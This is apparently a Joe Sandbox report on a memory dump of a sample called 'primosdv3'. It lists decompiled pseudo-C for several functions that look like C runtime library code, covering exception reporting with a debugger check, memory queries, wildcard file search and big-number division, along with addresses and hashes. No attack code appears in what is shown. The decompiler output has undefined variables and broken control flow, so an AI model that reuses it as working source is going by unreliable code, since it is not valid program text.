Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1206968400-2756464174
Opcode ID: a62e7ee4ccef4782e68d45d67c8efa2fea90df3403b6232337cb2338dfe5d810
Instruction ID: 7ff2c2559c627ed7c9be9e7cb2b1e194ca5ec871d471f5d6f439ea3bfa47db60
Opcode Fuzzy Hash: a62e7ee4ccef4782e68d45d67c8efa2fea90df3403b6232337cb2338dfe5d810
Instruction Fuzzy Hash: D86217715006858FDB39DF38C8D56EA3BA1EF54300F08457EECAA8B283D7759A45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C7F838 Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00C7F838(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E00C7FA46(_t34);
				 *_t60 = 0x2cc;
				_v632 = E00C7FFF0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E00C7FFF0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E00C7FA46(_t49);
				}
				return _t49;
			}

0x00c7f838
0x00c7f838
0x00c7f838
0x00c7f84c
0x00c7f84e
0x00c7f851
0x00c7f851
0x00c7f855
0x00c7f85a
0x00c7f872
0x00c7f878
0x00c7f87e
0x00c7f884
0x00c7f88a
0x00c7f890
0x00c7f896
0x00c7f89d
0x00c7f8a4
0x00c7f8ab
0x00c7f8b2
0x00c7f8b9
0x00c7f8c0
0x00c7f8c1
0x00c7f8ca
0x00c7f8d0
0x00c7f8d3
0x00c7f8d9
0x00c7f8e8
0x00c7f8f4
0x00c7f8ff
0x00c7f906
0x00c7f90d
0x00c7f918
0x00c7f920
0x00c7f929
0x00c7f92b
0x00c7f92e
0x00c7f930
0x00c7f93a
0x00c7f942
0x00c7f948
0x00000000
0x00c7f94f
0x00c7f952

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00C7F844
IsDebuggerPresent.KERNEL32 ref: 00C7F910
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C7F930
UnhandledExceptionFilter.KERNEL32(?), ref: 00C7F93A

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: ecf6325ad47a8273381bdebf80da703ce245945ed1c3576d2452040e24dfa99c
Instruction ID: ea37bbc06fac6e0867a3c35c80a8b12ec9ff6fc2fbc6d29f53953bd9512a2dda
Opcode Fuzzy Hash: ecf6325ad47a8273381bdebf80da703ce245945ed1c3576d2452040e24dfa99c
Instruction Fuzzy Hash: F9312975D05219DBDB21DFA4D9897CDBBF8AF08304F1080AAE50CAB290EB719B859F45

Uniqueness

Uniqueness Score: -1.00%

Function 00C7E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 83%

			E00C7E6A3(signed int _a4, signed int _a8) {
				struct _MEMORY_BASIC_INFORMATION _v32;
				struct _SYSTEM_INFO _v68;
				long _t20;
				signed int _t28;
				void* _t30;
				signed int _t32;
				signed int _t40;
				signed int _t45;

				_t20 = VirtualQuery(_a4,  &_v32, 0x1c);
				if(_t20 == 0) {
					_push(0x19);
					asm("int 0x29");
				}
				if((_v32.Protect & 0x00000044) != 0) {
					GetSystemInfo( &_v68);
					_t40 = _v68.dwPageSize;
					_t32 = _t40 - 1;
					_t45 =  !_t32 & _a4;
					_t28 = _a8 / _t40;
					_t30 = ((_t32 & _a4) + _t40 + (_t32 & _a8) - 1) / _t40 + _t28;
					if(_t30 == 0) {
						L5:
						return _t28;
					} else {
						goto L4;
					}
					do {
						L4:
						_t28 = 0;
						asm("lock or [esi], eax");
						_t45 = _t45 + _t40;
						_t30 = _t30 - 1;
					} while (_t30 != 0);
					goto L5;
				}
				return _t20;
			}

0x00c7e6b4
0x00c7e6bc
0x00c7e6be
0x00c7e6c1
0x00c7e6c1
0x00c7e6c7
0x00c7e6cf
0x00c7e6d5
0x00c7e6d8
0x00c7e6ea
0x00c7e6fa
0x00c7e6fc
0x00c7e6fe
0x00c7e70c
0x00000000
0x00000000
0x00000000
0x00000000
0x00c7e700
0x00c7e700
0x00c7e700
0x00c7e702
0x00c7e705
0x00c7e707
0x00c7e707
0x00000000
0x00c7e700
0x00c7e70f

APIs

VirtualQuery.KERNEL32(80000000,00C7E5E8,0000001C,00C7E7DD,00000000,?,?,?,?,?,?,?,00C7E5E8,00000004,00CC1CEC,00C7E86D), ref: 00C7E6B4
GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00C7E5E8,00000004,00CC1CEC,00C7E86D), ref: 00C7E6CF

Strings

D, xrefs: 00C7E6C3

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: 5f9411ce0f341d0277a44c731dd9a038e113d9c11e1c18aac6a3afe3498731a1
Instruction ID: e5063138db3a2787cbf4acaaa5d0a43b7b01d6d00c9c196f46162d1d975edec2
Opcode Fuzzy Hash: 5f9411ce0f341d0277a44c731dd9a038e113d9c11e1c18aac6a3afe3498731a1
Instruction Fuzzy Hash: 2401A7736001096BDB14DE29DC49BDD7BAAAFC8328F0CC165ED6DD7164D734DA058690

Uniqueness

Uniqueness Score: -1.00%

Function 00C88EBD Relevance: 4.6, APIs: 3, Instructions: 78
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 79%

			E00C88EBD(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0xc9e7ac; // 0x2b9f4dac
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00C7FA46(_t41);
					_pop(_t61);
				}
				E00C7FFF0(_t66,  &_v804, 0, 0x50);
				E00C7FFF0(_t66,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t25 =  &_v0; // 0x7
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // -805
				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00C7FA46(_t57);
				}
				return E00C7FBBC(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}

0x00c88ebd
0x00c88ebd
0x00c88ebd
0x00c88ec8
0x00c88ecd
0x00c88ecf
0x00c88ed7
0x00c88ed9
0x00c88edc
0x00c88ee1
0x00c88ee1
0x00c88eed
0x00c88f00
0x00c88f0e
0x00c88f14
0x00c88f1a
0x00c88f20
0x00c88f26
0x00c88f2c
0x00c88f32
0x00c88f38
0x00c88f3e
0x00c88f44
0x00c88f4b
0x00c88f52
0x00c88f59
0x00c88f60
0x00c88f67
0x00c88f6e
0x00c88f6f
0x00c88f78
0x00c88f7e
0x00c88f7e
0x00c88f81
0x00c88f87
0x00c88f94
0x00c88f9d
0x00c88fa6
0x00c88faf
0x00c88fbd
0x00c88fbf
0x00c88fc5
0x00c88fd4
0x00c88fe0
0x00c88fe3
0x00c88fe8
0x00c88ff7

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00C88FB5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00C88FBF
UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00C88FCC

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 22dc6e3f2930eb27f5a77f140ec33bac3b6c427858b77c56296b7a9645acbae0
Instruction ID: 5f1ebbbd30731803b6cf1590a4411687ee2a83839e759386fd2521fef63c41fb
Opcode Fuzzy Hash: 22dc6e3f2930eb27f5a77f140ec33bac3b6c427858b77c56296b7a9645acbae0
Instruction Fuzzy Hash: B031D67590122CABCB21DF68DC89B9DBBB8BF08310F5041EAE41CA7250EB709F858F54

Uniqueness

Uniqueness Score: -1.00%

Function 00C8B348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00C8B348(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				union _FINDEX_INFO_LEVELS _t58;
				signed int _t62;
				signed int _t65;
				void* _t71;
				void* _t73;
				signed int _t74;
				void* _t77;
				CHAR* _t78;
				void* _t79;
				intOrPtr* _t82;
				intOrPtr _t84;
				void* _t86;
				intOrPtr* _t87;
				signed int _t91;
				signed int _t95;
				void* _t100;
				signed int _t103;
				union _FINDEX_INFO_LEVELS _t104;
				void* _t105;
				void* _t108;
				void* _t109;
				intOrPtr _t110;
				void* _t111;
				void* _t112;
				signed int _t116;
				void* _t117;
				signed int _t118;
				void* _t119;
				void* _t120;

				_push(__ecx);
				_t82 = _a4;
				_t2 = _t82 + 1; // 0x1
				_t100 = _t2;
				do {
					_t35 =  *_t82;
					_t82 = _t82 + 1;
				} while (_t35 != 0);
				_t103 = _a12;
				_t84 = _t82 - _t100 + 1;
				_v8 = _t84;
				if(_t84 <= (_t35 | 0xffffffff) - _t103) {
					_t5 = _t103 + 1; // 0x1
					_t77 = _t5 + _t84;
					_t109 = E00C8B136(_t84, _t77, 1);
					_t86 = _t108;
					__eflags = _t103;
					if(_t103 == 0) {
						L6:
						_push(_v8);
						_t77 = _t77 - _t103;
						_t40 = E00C8F101(_t86, _t109 + _t103, _t77, _a4);
						_t118 = _t117 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t71 = E00C8B587(_a16, _t100, __eflags, _t109);
							E00C88DCC(0);
							_t73 = _t71;
							goto L8;
						}
					} else {
						_push(_t103);
						_t74 = E00C8F101(_t86, _t109, _t77, _a8);
						_t118 = _t117 + 0x10;
						__eflags = _t74;
						if(_t74 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00C89097();
							asm("int3");
							_t116 = _t118;
							_t119 = _t118 - 0x150;
							_t43 =  *0xc9e7ac; // 0x2b9f4dac
							_v48 = _t43 ^ _t116;
							_t87 = _v32;
							_push(_t77);
							_t78 = _v36;
							_push(_t109);
							_t110 = _v332.cAlternateFileName;
							_push(_t103);
							_v372 = _t110;
							while(1) {
								__eflags = _t87 - _t78;
								if(_t87 == _t78) {
									break;
								}
								_t45 =  *_t87;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t87 = E00C8F150(_t78, _t87);
											continue;
										}
									}
								}
								break;
							}
							_t101 =  *_t87;
							__eflags = _t101 - 0x3a;
							if(_t101 != 0x3a) {
								L19:
								_t104 = 0;
								__eflags = _t101 - 0x2f;
								if(_t101 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t101 - 0x5c;
									if(_t101 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t101 - 0x3a;
										if(_t101 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t89 = _t87 - _t78 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t87 - _t78 + 0x00000001;
								E00C7FFF0(_t104,  &_v332, _t104, 0x140);
								_t120 = _t119 + 0xc;
								_t111 = FindFirstFileExA(_t78, _t104,  &_v332, _t104, _t104, _t104);
								_t55 = _v336;
								__eflags = _t111 - 0xffffffff;
								if(_t111 != 0xffffffff) {
									_t91 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t91;
									_t92 = _t91 >> 2;
									_v344 = _t91 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E00C8B348(_t92,  &(_v332.cFileName), _t78, _v340);
											_t120 = _t120 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t92 = _v287;
											__eflags = _t92;
											if(_t92 == 0) {
												goto L37;
											} else {
												__eflags = _t92 - 0x2e;
												if(_t92 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t111,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t101 =  *_t55;
									_t95 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t95 - _t65;
									if(_t95 != _t65) {
										E00C86310(_t78, _t101 + _t95 * 4, _t65 - _t95, 4, E00C8B1A0);
									}
								} else {
									_push(_t55);
									_t57 = E00C8B348(_t89, _t78, _t104, _t104);
									L26:
									_t104 = _t57;
								}
								__eflags = _t111 - 0xffffffff;
								if(_t111 != 0xffffffff) {
									FindClose(_t111);
								}
								_t58 = _t104;
							} else {
								__eflags = _t87 -  &(_t78[1]);
								if(_t87 ==  &(_t78[1])) {
									goto L19;
								} else {
									_push(_t110);
									_t58 = E00C8B348(_t87, _t78, 0, 0);
								}
							}
							_pop(_t105);
							_pop(_t112);
							__eflags = _v12 ^ _t116;
							_pop(_t79);
							return E00C7FBBC(_t58, _t79, _v12 ^ _t116, _t101, _t105, _t112);
						} else {
							goto L6;
						}
					}
				} else {
					_t73 = 0xc;
					L8:
					return _t73;
				}
				L40:
			}

0x00c8b34d
0x00c8b34e
0x00c8b351
0x00c8b351
0x00c8b354
0x00c8b354
0x00c8b356
0x00c8b357
0x00c8b361
0x00c8b364
0x00c8b367
0x00c8b36c
0x00c8b375
0x00c8b378
0x00c8b382
0x00c8b385
0x00c8b386
0x00c8b388
0x00c8b39c
0x00c8b39c
0x00c8b39f
0x00c8b3a9
0x00c8b3ae
0x00c8b3b1
0x00c8b3b3
0x00000000
0x00c8b3b5
0x00c8b3b9
0x00c8b3c2
0x00c8b3c8
0x00000000
0x00c8b3cb
0x00c8b38a
0x00c8b38a
0x00c8b390
0x00c8b395
0x00c8b398
0x00c8b39a
0x00c8b3d1
0x00c8b3d3
0x00c8b3d4
0x00c8b3d5
0x00c8b3d6
0x00c8b3d7
0x00c8b3d8
0x00c8b3dd
0x00c8b3e1
0x00c8b3e3
0x00c8b3e9
0x00c8b3f0
0x00c8b3f3
0x00c8b3f6
0x00c8b3f7
0x00c8b3fa
0x00c8b3fb
0x00c8b3fe
0x00c8b3ff
0x00c8b420
0x00c8b420
0x00c8b422
0x00000000
0x00000000
0x00c8b407
0x00c8b409
0x00c8b40b
0x00c8b40d
0x00c8b40f
0x00c8b411
0x00c8b413
0x00c8b41e
0x00000000
0x00c8b41e
0x00c8b413
0x00c8b40f
0x00000000
0x00c8b40b
0x00c8b424
0x00c8b426
0x00c8b429
0x00c8b442
0x00c8b442
0x00c8b444
0x00c8b447
0x00c8b457
0x00c8b459
0x00c8b459
0x00c8b449
0x00c8b449
0x00c8b44c
0x00000000
0x00c8b44e
0x00c8b44e
0x00c8b451
0x00000000
0x00c8b453
0x00c8b453
0x00c8b453
0x00c8b451
0x00c8b44c
0x00c8b45f
0x00c8b467
0x00c8b46b
0x00c8b479
0x00c8b47e
0x00c8b493
0x00c8b495
0x00c8b49b
0x00c8b49e
0x00c8b4d0
0x00c8b4d0
0x00c8b4d2
0x00c8b4d5
0x00c8b4db
0x00c8b4db
0x00c8b4e2
0x00c8b4fc
0x00c8b4fc
0x00c8b50b
0x00c8b510
0x00c8b513
0x00c8b515
0x00000000
0x00000000
0x00000000
0x00000000
0x00c8b4e4
0x00c8b4e4
0x00c8b4ea
0x00c8b4ec
0x00000000
0x00c8b4ee
0x00c8b4ee
0x00c8b4f1
0x00000000
0x00c8b4f3
0x00c8b4f3
0x00c8b4fa
0x00000000
0x00000000
0x00000000
0x00000000
0x00c8b4fa
0x00c8b4f1
0x00c8b4ec
0x00000000
0x00c8b517
0x00c8b51f
0x00c8b525
0x00c8b527
0x00c8b527
0x00c8b52f
0x00c8b534
0x00c8b53c
0x00c8b53f
0x00c8b541
0x00c8b555
0x00c8b55a
0x00c8b4a0
0x00c8b4a0
0x00c8b4a4
0x00c8b4ac
0x00c8b4ac
0x00c8b4ac
0x00c8b4ae
0x00c8b4b1
0x00c8b4b4
0x00c8b4b4
0x00c8b4ba
0x00c8b42b
0x00c8b42e
0x00c8b430
0x00000000
0x00c8b432
0x00c8b432
0x00c8b438
0x00c8b43d
0x00c8b430
0x00c8b4bf
0x00c8b4c0
0x00c8b4c1
0x00c8b4c3
0x00c8b4cc
0x00000000
0x00000000
0x00000000
0x00c8b39a
0x00c8b36e
0x00c8b370
0x00c8b3cc
0x00c8b3d0
0x00c8b3d0
0x00000000

Strings

., xrefs: 00C8B4DB

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: d8e486411d747f6c2f03cd0a8a398365b38f3e7ad1859f404b1bf20d4114c29c
Instruction ID: 42130e66d8e142a58cef419672cdd6bf0374b7666e4c524589558b45206b8fff
Opcode Fuzzy Hash: d8e486411d747f6c2f03cd0a8a398365b38f3e7ad1859f404b1bf20d4114c29c
Instruction Fuzzy Hash: 5B31E771900249AFCB24AE78CC85EFF7BBDDB85318F1441A8F929D7252EB309E458B54

Uniqueness

Uniqueness Score: -1.00%

Function 00C8D440 Relevance: 3.5, APIs: 2, Instructions: 464
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 90%

			E00C8D440(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffffe9e5
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
